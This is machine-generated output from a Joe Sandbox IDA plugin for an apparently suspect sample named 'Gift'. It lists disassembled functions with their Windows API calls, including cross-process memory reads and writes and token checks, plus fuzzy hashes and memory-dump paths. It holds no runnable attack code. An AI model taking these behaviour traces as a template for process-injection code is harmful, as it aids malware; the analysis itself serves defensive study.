                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$MetricsSystem
                                                                          • String ID:
                                                                          • API String ID: 2294984445-0
                                                                          • Opcode ID: 6e76bdb8796aea0344402c510d7e42da373ed4b45a798c95df178e5bf761015b
                                                                          • Instruction ID: 128cb2996386876adab02f5714f3f4c509a85a40f27caadc9288e74f767152d4
                                                                          • Opcode Fuzzy Hash: 6e76bdb8796aea0344402c510d7e42da373ed4b45a798c95df178e5bf761015b
                                                                          • Instruction Fuzzy Hash: 2C219131918265AFCB169F38CC09E6A7BA8FB05726F114729FD26D21F0D7709814CB90
                                                                          APIs
                                                                          • IsWindow.USER32(00000000), ref: 00346159
                                                                          • GetForegroundWindow.USER32 ref: 00346170
                                                                          • GetDC.USER32(00000000), ref: 003461AC
                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 003461B8
                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 003461F3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ForegroundPixelRelease
                                                                          • String ID:
                                                                          • API String ID: 4156661090-0
                                                                          • Opcode ID: 4f1b8f5a4da1a96af8391cd6d2a5faf32253b1c05a8ec1159d1510003e5a3f1e
                                                                          • Instruction ID: 8787d36751e260bc3c9335a58d97ee565094d9b9a708f0b662af7eb755edd960
                                                                          • Opcode Fuzzy Hash: 4f1b8f5a4da1a96af8391cd6d2a5faf32253b1c05a8ec1159d1510003e5a3f1e
                                                                          • Instruction Fuzzy Hash: A221A475A002049FD705EF65DD85A6AB7F9EF49311F04C479F84A97362CA70BC00CB90
                                                                          APIs
                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D1729
                                                                          • SelectObject.GDI32(?,00000000), ref: 002D1738
                                                                          • BeginPath.GDI32(?), ref: 002D174F
                                                                          • SelectObject.GDI32(?,00000000), ref: 002D1778
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                          • String ID:
                                                                          • API String ID: 3225163088-0
                                                                          • Opcode ID: fada9887d9d92f15919696738028bda6c56e342b04c763d59694884efc3bed37
                                                                          • Instruction ID: 716138f48cb44955b63c1c31bd571da44d3359998c90d48b2ea86a744c544cac
                                                                          • Opcode Fuzzy Hash: fada9887d9d92f15919696738028bda6c56e342b04c763d59694884efc3bed37
                                                                          • Instruction Fuzzy Hash: 1E217430528209FBEB129F28DD4A7A97BADFB00311F148217F815966F0D7B29DB1CB90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memcmp
                                                                          • String ID:
                                                                          • API String ID: 2931989736-0
                                                                          • Opcode ID: 31d76904bbb4853c147f6767b3e1dc2ea9bff08732a57183e739b04e704d6a0c
                                                                          • Instruction ID: 213cca13a921da2190894d53f37044ae490567488855ab9aade812ef255ceb5a
                                                                          • Opcode Fuzzy Hash: 31d76904bbb4853c147f6767b3e1dc2ea9bff08732a57183e739b04e704d6a0c
                                                                          • Instruction Fuzzy Hash: 92019272A601297BD216A511AC82FFFA36C9E603D4B05C135FE0697746E760DE2586E0
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00335075
                                                                          • __beginthreadex.LIBCMT ref: 00335093
                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 003350A8
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003350BE
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003350C5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 3824534824-0
                                                                          • Opcode ID: 5ec43a4198a4a93dd9be61bdbb5b261ece1722eb61e986f0b49043a68e3ac251
                                                                          • Instruction ID: 39c15e81004566bbf057e452d55529243e486bd608a0cf0a4ce41181926ef2a9
                                                                          • Opcode Fuzzy Hash: 5ec43a4198a4a93dd9be61bdbb5b261ece1722eb61e986f0b49043a68e3ac251
                                                                          • Instruction Fuzzy Hash: 6B110876928609BBC7079BA89C48A9B7BACEB46320F144256F814D3390D6B2890487F0
                                                                          APIs
                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00328E3C
                                                                          • GetLastError.KERNEL32(?,00328900,?,?,?), ref: 00328E46
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00328900,?,?,?), ref: 00328E55
                                                                          • HeapAlloc.KERNEL32(00000000,?,00328900,?,?,?), ref: 00328E5C
                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00328E73
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 842720411-0
                                                                          • Opcode ID: 3fb8a76332208e496ed7bde6f4250c31c04607b21556322a780cf635735af6ff
                                                                          • Instruction ID: e32e3894d5016735f2153943e6be86cc54b8a9073be520ce9406a6421ae6027d
                                                                          • Opcode Fuzzy Hash: 3fb8a76332208e496ed7bde6f4250c31c04607b21556322a780cf635735af6ff
                                                                          • Instruction Fuzzy Hash: A6018174201214BFDB264FA5EC4DD6B7FBDEF8A355B114929F849C2220DBB19C10CAA0
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0033581B
                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00335829
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00335831
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0033583B
                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00335877
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                          • String ID:
                                                                          • API String ID: 2833360925-0
                                                                          • Opcode ID: a9908b3d6a2b5ce0b3809af1732d689128cb86ab4f95c15718b6eaa78008800e
                                                                          • Instruction ID: 14a639ae1adfe9351f03e903ae539e52495513023cafb81eba7e662f8d1db2d9
                                                                          • Opcode Fuzzy Hash: a9908b3d6a2b5ce0b3809af1732d689128cb86ab4f95c15718b6eaa78008800e
                                                                          • Instruction Fuzzy Hash: 6D016935E01A2DDBCF0A9FE4DC89AEEBBBCFB09711F018556E401B6140CB709550CBA1
                                                                          APIs
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?,?,?,00328073), ref: 00327D45
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?,?), ref: 00327D60
                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?,?), ref: 00327D6E
                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?), ref: 00327D7E
                                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00327C62,80070057,?,?), ref: 00327D8A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 3897988419-0
                                                                          • Opcode ID: 171ef278cbb195654370946d4e411ce00bdef88683565affed852dfcbe1f32ba
                                                                          • Instruction ID: ebbe6e678d1b4c10e6452eb129eb172607feb7706dc82ffa870ec824b660d59d
                                                                          • Opcode Fuzzy Hash: 171ef278cbb195654370946d4e411ce00bdef88683565affed852dfcbe1f32ba
                                                                          • Instruction Fuzzy Hash: 3A017C76605224ABDB168F64EC45BAA7BADFF84752F148024F908D7210D7B1ED00CBE0
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00328CDE
                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00328CE8
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00328CF7
                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00328CFE
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00328D14
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 74a28e696ba62d3ea48fd60ae3b69e1b87f8c3e19e30697b426dcb48350eaf38
                                                                          • Instruction ID: 197bc59c93c7fe78963f05cfc7d2f99e325069d0c5df16f175981567d07dff86
                                                                          • Opcode Fuzzy Hash: 74a28e696ba62d3ea48fd60ae3b69e1b87f8c3e19e30697b426dcb48350eaf38
                                                                          • Instruction Fuzzy Hash: BAF0AF34201214AFEB160FA4AC8EE6B3BACEF4A754F108425F904C2190CAA19C04DB60
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00328D3F
                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00328D49
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D58
                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D5F
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D75
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 80447417e09f891466dcab9357ee4477796d461f4fab3814ae3fb7b9006933f8
                                                                          • Instruction ID: 0c6521ef21195f39495e71181ec7fac3df67d273b2d7ed5fbda305838853041f
                                                                          • Opcode Fuzzy Hash: 80447417e09f891466dcab9357ee4477796d461f4fab3814ae3fb7b9006933f8
                                                                          • Instruction Fuzzy Hash: 2CF0A934211214AFEB260FA4FC89F6B3BACEF8A754F144529F944C21A0CBB19D05DB60
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0032CD90
                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0032CDA7
                                                                          • MessageBeep.USER32(00000000), ref: 0032CDBF
                                                                          • KillTimer.USER32(?,0000040A), ref: 0032CDDB
                                                                          • EndDialog.USER32(?,00000001), ref: 0032CDF5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 684d89e7e68a8ba3676dcb8c9b78d0054e75c2bd9592dbf4091e5d39c060b7d2
                                                                          • Instruction ID: 80504e2c6ae447c984e46de30e1f117e44e1986d6956cb5fb63f39a4fdc3642d
                                                                          • Opcode Fuzzy Hash: 684d89e7e68a8ba3676dcb8c9b78d0054e75c2bd9592dbf4091e5d39c060b7d2
                                                                          • Instruction Fuzzy Hash: 2901D630510714ABEB265B24ED4FBAB7B7CFB00701F004669F583A14E1DBF0A9648B90
                                                                          APIs
                                                                          • EndPath.GDI32(?), ref: 002D179B
                                                                          • StrokeAndFillPath.GDI32(?,?,0030BBC9,00000000,?), ref: 002D17B7
                                                                          • SelectObject.GDI32(?,00000000), ref: 002D17CA
                                                                          • DeleteObject.GDI32 ref: 002D17DD
                                                                          • StrokePath.GDI32(?), ref: 002D17F8
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: ed9a2583c097970bae976bed4be8bcd6312358be92288a6e3c3dfad7c5556b16
                                                                          • Instruction ID: 70d71d840e3d688a46a5f15ed815de9b0899b48c653e0efb81cab13c502189a3
                                                                          • Opcode Fuzzy Hash: ed9a2583c097970bae976bed4be8bcd6312358be92288a6e3c3dfad7c5556b16
                                                                          • Instruction Fuzzy Hash: 40F0C93002C209BBEB276F25ED4E7597FA8A701326F148216F429556F0C7B249A5DF10
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 0033CA75
                                                                          • CoCreateInstance.OLE32(00363D3C,00000000,00000001,00363BAC,?), ref: 0033CA8D
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • CoUninitialize.OLE32 ref: 0033CCFA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                          • String ID: .lnk
                                                                          • API String ID: 2683427295-24824748
                                                                          • Opcode ID: cb623493cd7246ce2d0844681ae142d3a15c288e89f92ebe12b3b0885d23692e
                                                                          • Instruction ID: ae0495860015fe2906f34d544fe5be1028d4e027ab7bea3ca4c3c1f0242301e0
                                                                          • Opcode Fuzzy Hash: cb623493cd7246ce2d0844681ae142d3a15c288e89f92ebe12b3b0885d23692e
                                                                          • Instruction Fuzzy Hash: F8A14971514205AFD300EF64C891EAFB7E8EF98708F40496DF155972A2EB70EE19CB92
                                                                          APIs
                                                                            • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
                                                                            • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 002E1680: _memmove.LIBCMT ref: 002E16DB
                                                                          • __swprintf.LIBCMT ref: 002DE598
                                                                          Strings
                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002DE431
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Similarity
                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                          • API String ID: 1943609520-557222456
                                                                          • Opcode ID: a39a647851c5dd4ac3d3735e27e1706022549877ef422dd06e69150cf429ca77
                                                                          • Instruction ID: f42d2949ee974b7242857c17edda8c1a21525609df287156740a36c8278804ff
                                                                          • Opcode Fuzzy Hash: a39a647851c5dd4ac3d3735e27e1706022549877ef422dd06e69150cf429ca77
                                                                          • Instruction Fuzzy Hash: 739190711286419FCB14FF24C895C6EB7A8EF95340F81092EF5959B2A1EB30ED64CF92
                                                                          APIs
                                                                          • __startOneArgErrorHandling.LIBCMT ref: 002F52CD
                                                                            • Part of subcall function 00300320: __87except.LIBCMT ref: 0030035B
                                                                          Similarity
                                                                          • API ID: ErrorHandling__87except__start
                                                                          • String ID: pow
                                                                          • API String ID: 2905807303-2276729525
                                                                          • Opcode ID: 2ad70f5dd6ff05d9d14d059dddacdea5f45175846537cb7f148e101524649936
                                                                          • Instruction ID: 120f1bf802848e7bef90aa2488fc8f6d30d620b2c248ca8adf3f9d4c9e912aac
                                                                          • Opcode Fuzzy Hash: 2ad70f5dd6ff05d9d14d059dddacdea5f45175846537cb7f148e101524649936
                                                                          • Instruction Fuzzy Hash: 84518221E2BA0A97CB1B7F19C92137AAB949B00790F308E79E7C1451D5EF748CE49F46
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #$+
                                                                          • API String ID: 0-2552117581
                                                                          • Opcode ID: 687c69d825f4a0c38941095f99c7ad769fc3d270fe916ad651c42c45479a7664
                                                                          • Instruction ID: 3657cabd9c734005f73bcbe330f201033602dc6c2caeb582b8792ad71be4b9ba
                                                                          • Opcode Fuzzy Hash: 687c69d825f4a0c38941095f99c7ad769fc3d270fe916ad651c42c45479a7664
                                                                          • Instruction Fuzzy Hash: 6C515A755002AACFDF26EF68D482AFABBA4FF55310F144065FD929B291D7309C62CB60
                                                                          Similarity
                                                                          • API ID: _memmove$_free
                                                                          • String ID: #V.
                                                                          • API String ID: 2620147621-4118664886
                                                                          • Opcode ID: 4e09ce321734f0cf85ac12983ab42f999b4a7557f6bb3408908d3c144ba121fc
                                                                          • Instruction ID: 1af07ec90ced4c5d30df04d92f713177152e2266d2b744d2256dabada2882591
                                                                          • Opcode Fuzzy Hash: 4e09ce321734f0cf85ac12983ab42f999b4a7557f6bb3408908d3c144ba121fc
                                                                          • Instruction Fuzzy Hash: 2D516A716187428FDB28DF28C481B6AB7E5BF85354F05492EE9898B351EB31EC51CB42
                                                                          Similarity
                                                                          • API ID: _memset$_memmove
                                                                          • String ID: ERCP
                                                                          • API String ID: 2532777613-1384759551
                                                                          • Opcode ID: 50f377d32cf25605fab5e7bd4ab5c757a68f12fb562ae39caf7d71224de098b1
                                                                          • Instruction ID: afc51b3964fff071c03af41e79493b2ce32cc0cb5717c094bf47a4411758a0e2
                                                                          • Opcode Fuzzy Hash: 50f377d32cf25605fab5e7bd4ab5c757a68f12fb562ae39caf7d71224de098b1
                                                                          • Instruction Fuzzy Hash: 5151F4B191034A9FDB24DF66C8807AABBF8EF04310F64856EE94ADB240E770D691CB40
                                                                          APIs
                                                                            • Part of subcall function 00331CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00329E4E,?,?,00000034,00000800,?,00000034), ref: 00331CE5
                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0032A3F7
                                                                            • Part of subcall function 00331C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00329E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00331CB0
                                                                            • Part of subcall function 00331BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00331C08
                                                                            • Part of subcall function 00331BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00329E12,00000034,?,?,00001004,00000000,00000000), ref: 00331C18
                                                                            • Part of subcall function 00331BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00329E12,00000034,?,?,00001004,00000000,00000000), ref: 00331C2E
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0032A464
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0032A4B1
                                                                          Similarity
                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                          • String ID: @
                                                                          • API String ID: 4150878124-2766056989
                                                                          • Opcode ID: ede2e97f26d9a223f2751c195da748a684b6f2cfa7d61b81116942c963539e41
                                                                          • Instruction ID: 6033f44020603d3f7e155deb9817220811dd23b0663df507ac8b3ff271f33da2
                                                                          • Opcode Fuzzy Hash: ede2e97f26d9a223f2751c195da748a684b6f2cfa7d61b81116942c963539e41
                                                                          • Instruction Fuzzy Hash: 11414E7294021CBFDB11DFA4DD86ADEB7B8EF45300F004095FA55B7290DAB1AE45CBA1
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00357A86
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00357A9A
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00357ABE
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: d9a53a94936e817c5aa86fd481aa8b2ca2b6256e44adeeaac96f71d2987d9bd6
                                                                          • Instruction ID: bd534c64fda9b4deb2c0766067a684ac645f3d28a5bf170d4e5fddee23f7c604
                                                                          • Opcode Fuzzy Hash: d9a53a94936e817c5aa86fd481aa8b2ca2b6256e44adeeaac96f71d2987d9bd6
                                                                          • Instruction Fuzzy Hash: 6B21A332610219BFDF268F54DC86FEE3B69EF48714F124114FE156B2E0DAB1A8548BA0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0035826F
